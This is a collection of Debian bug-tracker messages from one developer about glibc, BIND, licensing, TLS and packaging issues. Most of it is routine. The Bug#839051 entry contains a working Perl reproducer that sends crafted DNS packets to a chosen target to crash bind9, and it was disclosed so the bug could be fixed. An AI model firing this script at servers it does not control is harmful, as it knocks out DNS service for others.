Bug#998156: contains non-DFSG-free files

[Florian Weimer]

* Henry Cejtin:

> (I assume you meant ml-nlffigen.)  ml-nlffigen is part of SML/NJ, not
> part of MLton.

/usr/bin/mlnlffigen is part of mlton-tools.

I believe the code generation requirements are different for MLton and
SML/NJ.

Bug#998156: contains non-DFSG-free files

[Florian Weimer]

* Henry Cejtin:

> As far as I know, the ckit stuff is just included because it needed
> some tweaks to work under MLton.
> I don't think that any of "our" stuff depends on it.

I think mlnffigen needs ckit.

Bug#993162: libc6: i386 (Geode LX): latest push to Bookwork produces multiple sig ILL

[Florian Weimer]

* Aurelien Jarno:

> I have been looking at the corresponding instruction, this is:
>
> 2ed0 <__cpu_indicator_init@GCC_4.8.0>:
> 2ed0:   f3 0f 1e fb endbr32
>
> This is an Intel CET instruction, and it seems your CPU doesn't support
> executing it. Anyway this shows that the problem is in libgcc-s1, I am
> therefore reassigning the bug.

Correct, CET uses long NOPs, which are not supported by some x86 CPUs
and trap on them.

Thanks,
Florian

Bug#975219: [Debichem-devel] Bug#975219: elkcode: FTBFS: internal compiler error: in lookup_field_for_decl, at tree-nested.c:288

[Florian Weimer]

* Lucas Nussbaum:

> Hi Michael,
>
> On 22/11/20 at 15:32 +0100, Michael Banck wrote:
>> Hi Lucas,
>> 
>> That looks like an ICE, shouldn't that be filed with gfortran?
>
> Usually my logic is: if there's only one similar failure, I file a bug
> against the affected package, rather than against the toolchain package
> or the library, because it might be something very strange with the
> package that is causing the toolchain to misbehave.

ICEs are still consider GCC bugs (by upstream, maybe not by Debian),
as long as they are reproducible and not the result of faulty
hardware.

Bug#964815: it looks like dprof2calltree cannot be distributed with a GPL-2 work

[Florian Weimer]

* Nicholas D. Steeves:

> Hi,
>
> Adrian Bunk  writes:
>
>> On Fri, Jul 10, 2020 at 07:48:31PM -0400, Nicholas D Steeves wrote:
>>
>>> it would still not be DFSG-free, because it
>>> fails the "desert island test" for snail mail.  Were OmniTI Computer
>>> Consulting would accept email, it would also fail the "dissident test".
>>
>> This is the first time I see someone claiming BSD-4-clause would not
>> be distributable.
>>
>
> Well, BSD-4-clause isn't on the list of DFSG-approved licenses...
>
>   https://wiki.debian.org/DFSGLicenses

The DFSG announcement in

  

predates the removal of the advertising clause by almost two years.
As a result, there isn't any ambiguity at all whether the original
4-clause BSD license is DFSG-compliant or not: At the time, the BSD
license still had the advertising clause, and yet it is explicitly
considered as free.

And the Internet Archive agrees:



(The webwml history does not contain this version of the file,
probably because it wasn't in CVS at first.)

Bug#954715: glibc: FTBFS: tests failed: signal/tst-minsigstksz-1 signal/tst-minsigstksz-2

[Florian Weimer]

* Lucas Nussbaum:

> Source: glibc
> Version: 2.30-2
> Severity: serious
> Justification: FTBFS on amd64
> Tags: bullseye sid ftbfs
> Usertags: ftbfs-20200322 ftbfs-bullseye
>
> Hi,
>
> During a rebuild of all packages in sid, your package failed to build
> on amd64.

>> FAIL: signal/tst-minsigstksz-1
>> FAIL: signal/tst-minsigstksz-2

--
--
FAIL: signal/tst-minsigstksz-1
original exit status 1
Didn't expect signal from child: got `Segmentation fault'
--
--
FAIL: signal/tst-minsigstksz-2
original exit status 1
Incorrect signal from child: got `Segmentation fault', need `Aborted'


The build host has this CPU:

model name  : Intel(R) Xeon(R) Platinum 8175M CPU @ 2.50GHz

This CPU supports AVX-512, and the minimum signal stack size is not
large enough for the amount of data the kernel saves on the stack.

  

Bug#924712: crypt() not available _XOPEN_SOURCE is defined

[Florian Weimer]

* Francesco Poli:

> Hello everyone,
> I am sorry to ask, but... I cannot understand what's the status of
> [this bug report].
>
> [this bug report]: 
>
> A serious bug for libc6-dev without any apparent activity since last
> March?  Sure there must have been some hidden progress that I cannot
> see.

We provided a solution acceptable to the reporter.  I do not think
further action is needed on the glibc side.  The manual page needs to
be updated to reflect the change, but that's not part of glibc.

Bug#924891: glibc: FTBFS: /<>/build-tree/amd64-libc/conform/UNIX98/ndbm.h/scratch/ndbm.h-test.c:1:10: fatal error: ndbm.h: No such file or directory

[Florian Weimer]

retitle 924891 glibc: misc/tst-pkey fails due to cleared PKRU register after 
signal in amd64 32-bit compat mode 
thanks

* Lucas Nussbaum:

> On 27/03/19 at 08:48 +0100, Florian Weimer wrote:
>> > If that's useful, I can easily provide access to an AWS VM to debug this
>> > issue.
>> 
>> Oh, that would be quite helpful indeed.
>
> Can you send your SSH key? (I thought there was a way to get the SSH key
> for a DD, but I cannot find it anymore)
>
> Then you will be able to ssh to root@18.184.55.40.
> There's sbuild and schroot setup on the VM.
>
> When you are done, please 'poweroff' the machine, which will terminate
> it.

The issue reproduces outside the chroot, with the stretch userland.

What happens is that once we get out of the SIGUSR1 signal handler,
the PKRU register has value zero.  This happens around this code in
the test:

  /* Check that in a signal handler, there is no access.  */
  xsignal (SIGUSR1, _handler);
  xraise (SIGUSR1);
  xsignal (SIGUSR1, SIG_DFL);
  TEST_COMPARE (sigusr1_handler_ran, 1);

I checked the following (via a breakpoint in pkey_get; I don't think
GDB can read the PKRU register directly): Inside the SIGUSR1 signal
handler, PKRU has value 0x5554, as expected for this kernel, but
after the return, we get zero.  This is the first time a signal is
delivered on the main thread, so it's consistent with fairly broken
signal handling as far as the PKRU register is concerned.  I guess
clearing PKRU in this way might even constitute a minor security bug
(because the zero value means no restrictions).

This commit looks highly relevant:

commit a4455082dc6f0b5d51a23523f77600e8ede47c79
Author: Dave Hansen 
Date:   Wed Jun 8 10:25:33 2016 -0700

x86/signals: Add missing signal_compat code for x86 features

The 32-bit siginfo is a different binary format than the 64-bit
one.  So, when running 32-bit binaries on 64-bit kernels, we have
to convert the kernel's 64-bit version to a 32-bit version that
userspace can grok.

If the siginfo_t layout is incorrect (with regards to what the
hardware writes), I expect that we might end up copying back the wrong
PKRU value.

I'm not sure what to do here.  This really looks like a kernel bug.
Maybe we should just verify that this is fixed in the buster kernel
and move on?

Lucas, can you run your rebuild tests on newer kernels?

Bug#924891: glibc: FTBFS: /<>/build-tree/amd64-libc/conform/UNIX98/ndbm.h/scratch/ndbm.h-test.c:1:10: fatal error: ndbm.h: No such file or directory

[Florian Weimer]

* Lucas Nussbaum:

> On 26/03/19 at 23:10 +0100, Aurelien Jarno wrote:
>> On 2019-03-22 17:30, Florian Weimer wrote:
>> > > About the archive rebuild: The rebuild was done on EC2 VM instances from
>> > > Amazon Web Services, using a clean, minimal and up-to-date chroot. Every
>> > > failed build was retried once to eliminate random failures.
>> > 
>> > I believe the actual test failure is tst-pkey.
>> > 
>> > Presumably, this rebuild was performed on some Xeon SP CPU.  Do you
>> > know which model?  Do you have any information about the kernel and
>> > hypervisor used?
>> > 
>> > 32-bit protection key support has had issues from time to time.
>> 
>> Do you have some more details about the issue? Is it a glibc or a kernel
>> problem?
>> 
>> If we can't fix the issue easily on the libc side, I guess the way to
>> fix that is to XFAIL that test on 32-bit x86. 
>
> If that's useful, I can easily provide access to an AWS VM to debug this
> issue.

Oh, that would be quite helpful indeed.

Bug#924891: glibc: FTBFS: /<>/build-tree/amd64-libc/conform/UNIX98/ndbm.h/scratch/ndbm.h-test.c:1:10: fatal error: ndbm.h: No such file or directory

[Florian Weimer]

> About the archive rebuild: The rebuild was done on EC2 VM instances from
> Amazon Web Services, using a clean, minimal and up-to-date chroot. Every
> failed build was retried once to eliminate random failures.

I believe the actual test failure is tst-pkey.

Presumably, this rebuild was performed on some Xeon SP CPU.  Do you
know which model?  Do you have any information about the kernel and
hypervisor used?

32-bit protection key support has had issues from time to time.

Thanks.

Bug#924712: crypt() not available _XOPEN_SOURCE is defined

[Florian Weimer]

* Laurent Bigonville:

> Le 19/03/19 à 19:43, Florian Weimer a écrit :
>> * Laurent Bigonville:
>>
>>> Package: libc6-dev
>>> Version: 2.28-8
>>> Severity: serious
>>>
>>> Hi,
>>>
>>> The crypt.3 manpage, state that _XOPEN_SOURCE should be define for
>>> crypt() to be available.
>>>
>>> But it looks that it's currently the opposite, if _XOPEN_SOURCE is
>>> defined, the function cannot be found.

>> Can you compile the software using _DEFAULT_SOURCE (well, the default)
>> or _GNU_SOURCE instead?
>
> Yes, the software can be compile when _XOPEN_SOURCE is not defined or 
> when _GNU_SOURCE is defined instead

Sorry, what I was trying to ask is whether this would be an acceptable
change for you.

Bug#924712: crypt() not available _XOPEN_SOURCE is defined

[Florian Weimer]

* Laurent Bigonville:

> Package: libc6-dev
> Version: 2.28-8
> Severity: serious
>
> Hi,
>
> The crypt.3 manpage, state that _XOPEN_SOURCE should be define for
> crypt() to be available.
>
> But it looks that it's currently the opposite, if _XOPEN_SOURCE is
> defined, the function cannot be found.

Can you compile the software using _DEFAULT_SOURCE (well, the default)
or _GNU_SOURCE instead?

We do not want to provide the CRYPT extension anymore because it
implies not just support for the crypt function, but also for the DES
encryption functions, which definitely do not want.  In _XOPEN_SOURCE
mode, it's either all of these functions or none of them (and we chose
the latter because of DES), otherwise glibc wouldn't conform to the
interface specification.

We definitely should update the manual page, though.

Bug#904808: libcap-ng0: libcap-ng's use of pthread_atfork causes segfaults

[Florian Weimer]

The problem here is the weak declaration:

$ eu-readelf --symbols=.dynsym /lib64/libcap-ng.so.0.0.0 | grep pthread_atfork
   28:   0 NOTYPE  WEAK   DEFAULTUNDEF pthread_atfork

In the Fedora 29 build, the constructor looks like this:

Dump of assembler code for function init_lib:
   0x25d0 <+0>: endbr64 
   0x25d4 <+4>: cmpq   $0x0,0x4a0c(%rip)# 0x6fe8
   0x25dc <+12>:je 0x25ee 
   0x25de <+14>:lea0xcb(%rip),%rdx# 0x26b0 
   0x25e5 <+21>:xor%esi,%esi
   0x25e7 <+23>:xor%edi,%edi
   0x25e9 <+25>:jmpq   0x24f0 
   0x25ee <+30>:retq

src/cap-ng.c has this:

/*
 * The pthread_atfork function is being made weak so that we can use it
 * if the program is linked with pthreads and not requiring it for
 * everything that uses libcap-ng.
 */
extern int __attribute__((weak)) pthread_atfork(void (*prepare)(void),
void (*parent)(void), void (*child)(void));
…
static void init_lib(void) __attribute__ ((constructor));
static void init_lib(void)
{
if (pthread_atfork)
pthread_atfork(NULL, NULL, deinit);
}

This is wrong.  pthread_atfork needs to be *strong* reference, otherwise
the implementation in libc_nonshared.a is not used.  This implementation
provides the correct __dso_handle argument, allowing unregistration at
dlclose.

For glibc 2.28 and later, the fix should be simple: Just delete the weak
declaration.  For older glibc versions, you need to call
__register_atfork directly, with an explicit __dso_handle argument.  (I
believe systemd has an example of this which looks correct.)  This is a
stable glibc ABI, despite all those glibc internals.

We cannot fix this in libpthread because of the tail call in init_lib.
It destroys the caller's stack frame, so the identity of the calling DSO
is not available to pthread_atfork.  (Without the tail call, we could
use __builtin_return_address (0) and the internal variant of dladdr to
figure out the caller.)

Thanks,
Florian

Bug#907585: Backport also needs fixing

[Florian Weimer]

found 907585 20180518-1~bpo9+1
thanks

firmware-cavium_20180518-1~bpo9+1_all.deb is still in the package pool
and contains the offending binary.

Bug#857909: [libc6-dev] getpid() in child process created using clone(CLONE_VM) returns parent's pid

[Florian Weimer]

* John Paul Adrian Glaubitz:

> I would suggest filing a bug report to glibc upstream or posting on
> their mailing list to ask for feedback.

Upstream has since removed the PID cache:

  
  

Bug#846374: debsecan: Debsecan cannot access https://security-tracker.debian.org/tracker/debsecan/*/1

[Florian Weimer]

* Berke Durak:

> Debsecan stopped working.  It fails as it is trying to access
>
>https://security-tracker.debian.org/tracker/debsecan/release/1/GENERIC
>
> or /sid, /jessie, etc.
>
> It displays the following error:
>
>   % debsecan 
>   error: while downloading 
> https://security-tracker.debian.org/tracker/debsecan/release/1/GENERIC:
>   error: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed 
> (_ssl.c:590)
>
> The error message is a bit misleading

It is not, if the certificate verification fails, debsecan will never
get to the point where it will download anything and could notice that
the requested data is not available.

> - accessing the URL via
> another agent shows that while the SSL certificate is valid, the
> server responds with
>
>   Object not found
>   The requested debsecan object has not been found.

This could have been caused by pasting the wrong URL (e.g., with a
trailing colon).

> This could be a server issue or a change in debsecan.

Or something could intercept HTTPS traffic on your end, and the
interception certificate was not loaded into the system trust store.

Bug#839317: [pkg-golang-devel] Bug#839317: golang-1.7: FTBFS: tests failed

[Florian Weimer]

* Lucas Nussbaum:

>> --- FAIL: TestLoadFixed (0.00s)
>>  time_test.go:943: Now().In(loc).Zone() = "-01", -3600, want
>> "GMT+1", -3600

Is this due to a tzdata change?

Bug#832824: haskell-src-exts: reporting a bug at GHC for linker error. build fail on mips64el

[Florian Weimer]

* Clint Adams:

> Can you explain what GHC might be doing wrong?  Did binutils get
> stricter about something?  What is R_MIPS_GOT_DISP?  Are the GOT
> constraints the same on mips64el as they are on mipsel?

I suppose so, because the instruction encoding is quite similar.

According to the binutils sources, R_MIPS_GOT_DISP has a 16-bit limit
on 64-bit MIPS.

The GCC documentation mentions this:

| '-mxgot'
| '-mno-xgot'
|  Lift (do not lift) the usual restrictions on the size of the global
|  offset table.
| 
|  GCC normally uses a single instruction to load values from the GOT.
|  While this is relatively efficient, it only works if the GOT is
|  smaller than about 64k.  Anything larger causes the linker to
|  report an error such as:
| 
|   relocation truncated to fit: R_MIPS_GOT16 foobar
| 
|  If this happens, you should recompile your code with '-mxgot'.
|  This works with very large GOTs, although the code is also less
|  efficient, since it takes three instructions to fetch the value of
|  a global symbol.

So passing -mxgot would be worth a try.  This seems to be similar to
the -fpic/-fPIC distinction.

Bug#839260: ghostscript: various sandbox bypasses

[Florian Weimer]

Package: ghostscript
Version: 9.19~dfsg-3
Tags: security
Severity: grave

Tavis Ormandy has reported several sandbox bypasses on the
oss-security mailing list.

  
(also see follow-ups)

Filed upstream as:

  
  

This is a fairly important security issue because it introduces
vulnerabilities into CUPS and programs such as mail clients which use
mailcap entries and run Ghostscript indirectly.

Bug#839051: bind9: Unfixed crasher bug in wheezy LTS

[Florian Weimer]

Package: bind9
Version: 1:9.8.4.dfsg.P1-6+nmu2+deb7u10
Tags: security wheezy
Severity: grave

The wheezy LTS version of bind9 has an additional crasher bug.  It may
be due to an incomplete backport of the fix for CVE-2015-5477.  I'm
attaching the reproducer.

Upstream BIND without the fix for CVE-2016-2776 is *not* affected by
this issue, so it is something else.
use strict;
use warnings;

use Net::DNS;
use IO::Socket::INET;
use Socket;

$ARGV[0] or die "usage: $0 TARGET\n";

sub build_header {
return "\x12\x34"		# message ID
	. "\1\0"		# query
	. "\0\1"		# 1 question record
	. "\0\0\0\0"		# no answer, no authority
	. "\0\3";		# additional record count
}

sub long_name ($$) {
my ($pad, $length) = @_;
my $result = "";
while (length($result) < $length) {
	my $tofill = $length - length($result);
	if ($tofill > 63) {
	$tofill = 60;
	}
	$result .= chr($tofill) . ($pad x $tofill);
}
return $result . "\0";
}

for my $length (240 .. 255) {
for my $excess (20 .. 50) {
	my $packet = build_header() . long_name('a', $length);
	$packet .= "\0\1\0\1";		# IN A

	# Additional section.
	$packet .= "\0\0)" # OPT
	. pack("n", 512 + $excess)
	. "\0\0\200\0\0\0";

	$packet .= "\0\0\371\0\377\0\0\0\0";   # TKEY RR
	{
	my $tkey_rdata = "\xc0\x0c"	# Compression reference
		. "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
	$packet .= pack("n", length($tkey_rdata)) . $tkey_rdata;
	}
	if (0) {
	$packet .= "\0\0\371\0\377\0\0\0\0";   # TKEY RR
	{
		my $tkey_rdata = "\xc0\x0c"	# Compression reference
		. "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
		$packet .= pack("n", length($tkey_rdata)) . $tkey_rdata;
	}
	}

	$packet .= "\xc0\x0c\0\372\0\377\0\0\0\0";   # TSIG RR
	{
	my $rdata = "\xc0\x0c"	# Compression reference
		. ("\0" x 14);
	my $pad = "\xcc" x 0;
	$rdata .= pack("n", length($pad)) . $pad;
	$packet .= pack("n", length($rdata)) . $rdata;
	}

	if (0) {
	my $copy = $packet;
	my $pkt = Net::DNS::Packet->new(\$copy);
	$pkt->print;
	}

	print "length: $length, excess: $excess, packet: "
	. length($packet) . "\n";
	my $socket = IO::Socket::INET->new (PeerAddr => $ARGV[0],
	PeerPort => 53,
	Proto => 'udp');
	$socket->send($packet);
	$socket->setsockopt(SOL_SOCKET, SO_RCVTIMEO,
			pack('l!l!', 0, 200 * 1000))
	or die "setsockopt: $!";
	my $buf;
	eval {
	local $SIG{ALRM} = sub { die "alarm\n" };
	alarm 1;
	$socket->recv($buf, 1000);
	alarm 0;
	};
	$socket->close;
	print "answer: " . length($buf). "\n";
	# my $answer = Net::DNS::Packet->new(\$buf);
	# $answer->print;
}
}

Bug#839010: bind9: CVE-2016-2776: Assertion failure in query processing

[Florian Weimer]

Package: bind9
Version: 1:9.10.3.dfsg.P4-10.1
Tags: security
Severity: grave

ISC has released a security alert at

  

Relevant information from this report follows:

CVE:   CVE-2016-2776
Document Version:  2.0
Posting date:  2016-09-27
Program Impacted:  BIND
Versions affected: 9.0.x -> 9.8.x, 9.9.0->9.9.9-P2, 9.9.3-S1->9.9.9-S3,
   9.10.0->9.10.4-P2, 9.11.0a1->9.11.0rc1
Severity:  High
Exploitable:   Remotely

Description:

   Testing by ISC has uncovered a critical error condition which
   can occur when a nameserver is constructing a response.  A defect
   in the rendering of messages into packets can cause named to
   exit with an assertion failure in buffer.c while constructing a
   response to a query that meets certain criteria.

   This assertion can be triggered even if the apparent source
   address isn't allowed to make queries (i.e. doesn't match
   'allow-query').

Impact:

   All servers are vulnerable if they can receive request packets from
any source.

Bug#838960: denial of service with crafted id3v2 tags in all mpg123 versions since 0.60

[Florian Weimer]

* Thomas Orgis:

> Am Tue, 27 Sep 2016 10:27:04 +0100
> schrieb James Cowgill : 
>
>> Does this have a CVE ID? If not it should get one.
>
> I wondered about that. At the moment I just acted on the bug report and
> pushed the fix. I have to personal experience with the CVE procedure.
> In the past, just "someone" made them appear.
>
> I tried to apply for a CVE using the horrific Google docs form
> (http://iwantacve.org/) now. How can they resort to such a third-party
> ECMAScript-fest instead of a simple HTML form for _security_ issue
> reporting?!

This is the first time I have heard about that site.  The official
form is at:

  

(It still uses Javascript.)

But I'm not sure if this is in scope here because the web form
requires you to confirm that the issue is not in a “CNA-covered
product”.  Debian is a CNA-covered product, mpg123 is part of Debian,
so it is unclear what to do here.  I'll ask around.

Bug#819050: Please leave the severity at serious, this bug is a security issue.

[Florian Weimer]

* Hilko Bengen:

> the original report may not have been 100% clear on this, but the bug is
> the main cause of a vulnerability in Suricata (a network IDS/IPS) that
> allows for remote denial of service, possibly remote code execution by
> simply passing crafted packets by a Suricata installation.

Without the complete test case, that's hard to tell.

If we cannot reproduce this, perhaps Suricata (at least in stable)
should not explicitly enable the PCRE JIT compiler?

I'm not sure if we can keep rebasing PCRE just to fix JIT compiler
issues.

Bug#807341: git-repair: uses non-random tempdir /tmp/tmprepo.0/.git/

[Florian Weimer]

* Jonas Smedegaard:

> git-repair uses /tmp/tmprepo.0/.git/ which is clearly static, and I
> believe therefore (on non-hardened systems) insecure.

I think it does mkdir and if it fails, it tries again with
/tmp/tmprepo.1, /tmp/tmrepo.2, and so on.  I'm not sure you can abuse
this and fool git-repair into using a pre-existing directory with mode
777.  At least not with non-historic NFS.

Florian

Bug#803161: mailman: /var/log/mailman/* world-readable by default, leaking sensitive list information

[Florian Weimer]

severity 803161 normal
thanks

* Dominik George:

> Severity: critical
> Tags: security
> Justification: root security hole
>
> The log files of mailman, residing in /var/lib/mailman/log and in
> /var/log/mailman, and the log directory itself are created
> world-readable by default. This discloses sensitive information about
> list users, for example e-mail addresses and full names in the subscribe
> log, to all unprivileged system users that have shell or filesystem
> access.

This issue can be considered a security vulnerability, but it is
certainly not a rot security hole, hence lowering the severity.

Florian

Bug#801413: polarssl: CVE-2015-5291: Remote attack on clients using session tickets or SNI

[Florian Weimer]

* James Cowgill:

> They seemed pretty resistive to the idea of just adding specific
> patches on top of 1.3.9, and if you look at the changelog there are a
> number of other security bugs which seem important but don't have CVEs
> because they couldn't be triggered remotely.
> https://github.com/ARMmbed/mbedtls/blob/mbedtls-1.3.14/ChangeLog

I can sympathesize with that.  For example, I strongly recommend the
RSA-CRT hardening introduced in 1.3.13.

> One thing which was suggested was to use 1.3.14 and then disable at
> compile time all the new features which may affect the ABI and then
> revert the SONAME change, but is doing that actually allowed for the
> security archive or will the update be too big?

We can do that, but I don't know if it is a good idea to patch
cryptographic software in such extensive ways.

We can live with the addition of new symbols, but removal of symbols,
changes in struct sizes or offsets, and so on, would be hugely
problematic.  For are start, you could just build both the old and new
versions and run libabigail on them, to get an idea what actually did
change.

Florian

Bug#781128: security.debian.org: GeoDNS load balancing of Debian Security mirrors + out of date mirrors means you cant patch

[Florian Weimer]

* Sam McLeod:

 4) Mirror given by GeoDNS for security.debian.org was:
 - nashira.anu.edu.au (Located in Canberra, Australia)
 - Out of date and did not contain the patch.

As far as I can tell, the Australian mirror is in sync now:

$ wget -q -O- --header Host: security.debian.org 
http://gluck.debian.org/debian-security/dists/wheezy/updates/  | grep InRelease
trtd valign=topimg src=/icons/unknown.gif alt=[   ]/tdtda 
href=InReleaseInRelease/a/tdtd align=right24-Mar-2015 21:32  
/tdtd align=right101K/td/tr

Either this was temporary, or the issue had a different cause.

Note that mirror update is not instantaneous around the globe.  In
some cases, the debian-security-announce message will arrive some time
before packages are available.  In other cases, the message arrives
afterwards.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#781128: security.debian.org: GeoDNS load balancing of Debian Security mirrors + out of date mirrors means you cant patch

[Florian Weimer]

* Sam McLeod:

 So the fix is just to wait for all Debian mirrors to be in sync
 before you can patch?

We usually send out the announcement email only after the mirror sync
has completed.  But there can be delays, and other users might get
confused if there is a security update without a matching
announcement.

Can you confirm that the update is now available to you?


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#773610: libapache2-svn: apache2 restart failed: mod_dav_svn.so: undefined symbol:, dav_svn__new_error

[Florian Weimer]

* Arne Nordmark:

 The wheezy-security upload breaks libapache2-svn in exactly the same
 way as the previous upload 1.6.17dfsg-4+deb7u5, which was fixed in
 1.6.17dfsg-4+deb7u6, see bug number 741314 for more details.

Ugh, I'm building this now myself and will upload another version if
it passes basic testing.

(The build seems to disable all warnings, unfortuantely.)


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#760377: confirm apache 1 and gpl-1+ situation

[Florian Weimer]

* Paul Gevers:

 [2]
 http://anonscm.debian.org/cgit/collab-maint/xmlrpc-c.git/tree/lib/util/getoptx.h?h=debian-sid

You should investigate if you can use the getopt from glibc, which is
released under the LGPL.

 [3]
 http://anonscm.debian.org/cgit/collab-maint/xmlrpc-c.git/tree/tools/turbocharger/mod_gzip.c?h=debian-sid

I don't think this file is even compiled, so its license does not
matter.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#742140: libpam-oath: PAM module does not check whether strdup allocations succeeded

[Florian Weimer]

* Andreas Barth:

 we have the following debian bug report about an security isuse in
 libpam-oath (source oath-toolkit, upstream web page
 http://www.nongnu.org/oath-toolkit/ ).

 What is the appropriate process to get an CVE number on it? This issue
 is already public, as it is documented in the debian bug tracking
 system.

Does this actually have any application impact?  Not checking for
error on malloc failure is extremely common, and many applications use
wrappers such as xmalloc which explicitly terminate the process on
malloc failure.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#766397: Bug#766395: emacs/gnus: Uses s_client to for SSL.

[Florian Weimer]

* Richard Stallman:

 I've read that falling back to ssl3 is a real security hole,
 being exploited frequently.  That feature should be removed.

GNUTLS automatically and securely upgrades to a TLS protocol if
supported by the server.  Dropping SSL 3.0 support altogether will
only encourage unencrypted connections instead.  Furthermore, SSL 3.0
is certainly not an ideal design, but neither is TLS 1.0.  Only
TLS 1.1 and later attempt to fix the padding issue, and support for
those versions is still poor in servers.  Fortunately, the padding
issues are only exploitable under fairly narrow circumstances.
Most applications (except web browsers) use SSL 3.0 in such a way that
the attack described in the POODLE paper does not apply.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#742145: openssl: uses only 32 bytes (256 bit) for key generation

[Florian Weimer]

* Thorsten Glaser:

Historically, the OpenSSL command line tools have been intended for
debugging only.

 I disagree,

It's what I was told by the OpenSSL developers.

 Also, what do other tools (that do not invoke openssl(1)
 unlike most of these I saw, which were shell wrappers
 around it) do, entropy-wise?

There are different choices.  Some use more bits from /dev/urandom,
some even block on /dev/random.  The latter is quite problematic for
non-interactive key generation during package isntallation.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#734789: [CVE-2013-7284] Remote pre-authentication code execution in PlRPC

[Florian Weimer]

Package: libplrpc-perl
Severity: grave
Version: 0.2020-2
Tags: security upstream

The PlRPC module uses Storable in an unsafe way, leading to a remote
code execution vulnerability (in both the client and the server).

Upstream bug report:

https://rt.cpan.org/Public/Bug/Display.html?id=90474

A fix (which is not yet available) requires a protocol change.  I
think we should remove the package from the distribution instead.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#731933: libmicrohttpd: CVE-2013-7038 CVE-2013-7039

[Florian Weimer]

* Moritz Muehlenhoff:

 Please see 
 https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-7038
 https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-7039

When fixing this, please also include these two upstream commits.
Thanks.


r30927 | grothoff | 2013-11-28 11:05:52 +0100 (Thu, 28 Nov 2013) | 1 line

-handle case that original allocation request was zero

r30926 | grothoff | 2013-11-28 10:16:38 +0100 (Thu, 28 Nov 2013) | 1 line

-fix theoretical overflow issue reported by Florian Weimer


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#707410: NMU debdiff

[Florian Weimer]

I've NMU'ed these bugs, uploaded to DELAYED-5days.

diff -Nru mlton-20100608/debian/changelog mlton-20100608/debian/changelog
--- mlton-20100608/debian/changelog 2011-07-19 12:37:02.0 +0200
+++ mlton-20100608/debian/changelog 2013-10-19 19:45:37.0 +0200
@@ -1,3 +1,13 @@
+mlton (20100608-5.1) unstable; urgency=low
+
+  * Non-Maintainer Upload
+  * Apply upstream patch to avoid __gmp_const breakage
+(Closes: 707410)
+  * Apply patch from Matthias Klose to allow building on more target
+triplets on i386, not just i486-linux-gnu (Closes: 640137)
+
+ -- Florian Weimer f...@deneb.enyo.de  Sat, 19 Oct 2013 19:39:58 +0200
+
 mlton (20100608-5) unstable; urgency=low
 
   * Newest gcc and binutils fix mips[el] jump problem
diff -Nru mlton-20100608/debian/mlton-runtime-i486-linux-gnu.install 
mlton-20100608/debian/mlton-runtime-i486-linux-gnu.install
--- mlton-20100608/debian/mlton-runtime-i486-linux-gnu.install  2011-03-21 
19:55:23.0 +0100
+++ mlton-20100608/debian/mlton-runtime-i486-linux-gnu.install  2013-10-19 
19:44:39.0 +0200
@@ -1 +1 @@
-usr/lib/mlton/targets/i486-linux-gnu/*
+usr/lib/mlton/targets/i*86-linux-gnu/*
diff -Nru mlton-20100608/debian/patches/Replace-__gmp_const-with-const.patch 
mlton-20100608/debian/patches/Replace-__gmp_const-with-const.patch
--- mlton-20100608/debian/patches/Replace-__gmp_const-with-const.patch  
1970-01-01 01:00:00.0 +0100
+++ mlton-20100608/debian/patches/Replace-__gmp_const-with-const.patch  
2013-10-19 19:36:53.0 +0200
@@ -0,0 +1,55 @@
+From a658a1f4a76a01f568116598800f49b80cf8ee1a Mon Sep 17 00:00:00 2001
+From: David Larsen dcl9...@cs.rit.edu
+Date: Wed, 17 Apr 2013 15:28:24 -0400
+Subject: [PATCH] Replace '__gmp_const' with 'const'
+
+The __gmp_const macro was added to GMP as a workaround for C compilers
+which didn't support the const keyword.  GMP 5.1 removed support for
+pre-ANSI C compilers, so the __gmp_const workaround was removed at the
+same time.
+
+This change replaces all uses of '__gmp_const' with uses of the 'const'
+keword directly, since MLton already expects C99 support from the system
+C compiler.
+
+This should fix the build errors for systems using GMP = 5.1.
+---
+ runtime/gc/int-inf.c |8 
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/runtime/gc/int-inf.c b/runtime/gc/int-inf.c
+index 7f24e64..6a91390 100644
+--- a/runtime/gc/int-inf.c
 b/runtime/gc/int-inf.c
+@@ -181,8 +181,8 @@ objptr finiIntInfRes (GC_state s, __mpz_struct *res, 
size_t bytes) {
+ 
+ static inline objptr binary (objptr lhs, objptr rhs, size_t bytes,
+  void(*binop)(__mpz_struct *resmpz,
+-  __gmp_const __mpz_struct *lhsspace,
+-  __gmp_const __mpz_struct 
*rhsspace)) {
++  const __mpz_struct *lhsspace,
++  const __mpz_struct *rhsspace)) {
+   __mpz_struct lhsmpz, rhsmpz, resmpz;
+   mp_limb_t lhsspace[LIMBS_PER_OBJPTR + 1], rhsspace[LIMBS_PER_OBJPTR + 1];
+ 
+@@ -258,7 +258,7 @@ objptr IntInf_xorb (objptr lhs, objptr rhs, size_t bytes) {
+ 
+ static objptr unary (objptr arg, size_t bytes,
+  void(*unop)(__mpz_struct *resmpz,
+- __gmp_const __mpz_struct *argspace)) {
